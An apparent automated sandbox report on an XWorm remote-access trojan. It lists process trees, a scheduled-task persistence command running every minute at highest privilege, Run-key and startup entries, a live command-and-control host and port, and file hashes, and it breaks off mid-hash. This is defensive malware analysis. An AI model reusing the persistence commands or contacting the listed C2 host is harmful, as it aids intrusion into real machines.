PID 916 wrote to memory of 2060 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2060 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2060 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2272 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2272 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2272 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1340 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1340 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1340 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2124 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2124 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2124 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2564 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2564 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2564 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2692 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2692 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2692 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 280 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 280 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 280 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 2204 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Users\Admin\AppData\Local\Temp\cibqrp.exe
PID 2204 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Users\Admin\AppData\Local\Temp\cibqrp.exe
PID 2204 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Users\Admin\AppData\Local\Temp\cibqrp.exe
PID 916 wrote to memory of 1064 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1064 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1064 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2904 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2904 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2904 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2484 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2484 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2484 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2372 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2372 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 2372 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1328 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1328 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1328 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1168 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1168 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 916 wrote to memory of 1168 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\9
PID 2204 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 2204 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 2204 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 2204 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\system32\cmd.exe
PID 2204 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\system32\cmd.exe
PID 2204 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\system32\cmd.exe
PID 1044 wrote to memory of 992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1044 wrote to memory of 992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1044 wrote to memory of 992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "9" /tr "C:\Users\Admin\AppData\Roaming\9"

C:\Windows\system32\taskeng.exe

taskeng.exe {166897BF-E7FB-4B38-AD4F-162F09AC4BA0} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Local\Temp\cibqrp.exe

"C:\Users\Admin\AppData\Local\Temp\cibqrp.exe"

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /delete /f /tn "9"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1B9C.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp

Files

memory/2204-0-0x000007FEF5EA3000-0x000007FEF5EA4000-memory.dmp

memory/2204-1-0x00000000010D0000-0x00000000010E6000-memory.dmp

memory/2204-5-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

memory/2204-6-0x00000000004D0000-0x00000000004DC000-memory.dmp

memory/2204-7-0x0000000000560000-0x000000000056C000-memory.dmp

memory/2204-8-0x000007FEF5EA3000-0x000007FEF5EA4000-memory.dmp

memory/2204-9-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

C:\Users\Admin\AppData\Roaming\9

MD5 d172c0a4ae3e8cef6a0a910bde62e195
SHA1 51139fc633fe81a66c8ed55081f92ec5256bd0bd
SHA256 94b65da2b5cc3728547f892a46e9c48c5d54477d10ea8e210304593acd3568e7
SHA512 d82c930a42fd623aeee51007453d201e96110b546f1fb34080fc6d4c1488d71b3828f5f1833d347993444e4d332aa00fbb7b8922fce676d220375470ad0fa467

memory/3028-13-0x0000000001130000-0x0000000001146000-memory.dmp

memory/1972-16-0x00000000012D0000-0x00000000012E6000-memory.dmp

memory/2272-19-0x00000000013B0000-0x00000000013C6000-memory.dmp

memory/2124-22-0x0000000000330000-0x0000000000346000-memory.dmp

memory/2564-24-0x0000000000A90000-0x0000000000AA6000-memory.dmp

memory/280-27-0x0000000000320000-0x0000000000336000-memory.dmp

\Users\Admin\AppData\Local\Temp\cibqrp.exe

MD5 90d4d1e028d8be79482699f0a23eca1e
SHA1 1bb39ea5ddf177aab34a990ade5bd316b85f4dda
SHA256 03c10771abb8cd2ad13402826d8f69dee1f2637063d75613ece28ac557a842c4
SHA512 f710d67ad1beb2f9fb4e5a61d8e2fba2b28c0f7a390ee907e1c47f9396501e60062ef66459dd6ec2962e517c642f29c323c08522e477afb7f616b062bfd31617

memory/2204-31-0x000000013FCC0000-0x000000013FCEE000-memory.dmp

memory/1444-35-0x000000013FCC0000-0x000000013FCEE000-memory.dmp

memory/1064-37-0x0000000000BD0000-0x0000000000BE6000-memory.dmp

memory/2372-41-0x0000000000DF0000-0x0000000000E06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp1B9C.tmp.bat

MD5 6a889fa988b2ae81ab24b97e808d14bc
SHA1 f96c8353766fffd7ddef1f61574b08590b3a81de
SHA256 26c69258de12093e227f2f96ad66966e2d315bb0b095bc540dd61e44a492e218
SHA512 fcc436babe488425a6c8d759994411531b873666b6d4fbcfe03a680ae0e50e94cd6540d84d08bc8aeb687b8f4a175cdd91acae16ce9878e57c6d51d89d051fcf

memory/2204-54-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-30 20:07

Reported

2024-05-30 20:40

Platform

win10v2004-20240508-en

Max time kernel

1799s

Max time network

1800s

Command Line

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Uses the VBS compiler for execution

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9 = "C:\\Users\\Admin\\AppData\\Roaming\\9" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "9" /tr "C:\Users\Admin\AppData\Roaming\9"

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\arbdhjhr\arbdhjhr.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC76D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3B41AB182F4927863664736AA5672.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\2yps2p3l\2yps2p3l.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF2C3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc369B539194FA46D9861547C9D3559A88.TMP"

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
BE 2.17.196.96:443 www.bing.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
BE 2.17.196.96:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 96.196.17.2.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 163.126.19.2.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp

Files

memory/3668-0-0x00007FFD08013000-0x00007FFD08015000-memory.dmp

memory/3668-1-0x0000000000240000-0x0000000000256000-memory.dmp

memory/3668-5-0x00007FFD08010000-0x00007FFD08AD1000-memory.dmp

C:\Users\Admin\AppData\Roaming\9

MD5 d172c0a4ae3e8cef6a0a910bde62e195
SHA1 51139fc633fe81a66c8ed55081f92ec5256bd0bd
SHA256 94b65da2b5cc3728547f892a46e9c48c5d54477d10ea8e210304593acd3568e7
SHA512 d82c930a42fd623aeee51007453d201e96110b546f1fb34080fc6d4c1488d71b3828f5f1833d347993444e4d332aa00fbb7b8922fce676d220375470ad0fa467

memory/3656-8-0x00007FFD08010000-0x00007FFD08AD1000-memory.dmp

memory/3656-10-0x00007FFD08010000-0x00007FFD08AD1000-memory.dmp

memory/3668-11-0x00007FFD08010000-0x00007FFD08AD1000-memory.dmp

memory/3668-12-0x0000000002510000-0x000000000251C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/3668-17-0x000000001B0F0000-0x000000001B0FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\arbdhjhr\arbdhjhr.cmdline

MD5 ff941a42379fb288dea668f7cc59ec8b
SHA1 873a51c9f1a9fc7d8b530588f9eddff7a0c40d9e
SHA256 f4d2ac743c297ce6c2a5e034de5621df03878d665785a2fb0f96b8178f97ef4c
SHA512 db85e6e1d8bfdfd1daa493b777af57a60d832d2a4272af4f4ce9e4ddcc9dd5d285936bd690514fdebafc577e88ea5839f0034deec15edb496ba73e6bdaf7f4f9

C:\Users\Admin\AppData\Local\Temp\arbdhjhr\arbdhjhr.0.vb

MD5 156a4b3e570d9c7efc0f0094dbceb24e
SHA1 ccd7e470b9114884d6e958ab4d8b4c451f493c66
SHA256 7443a1bcd15924a389e5da2a0530b6703a35aed61e63cd1a1d7d0699d49a5a77
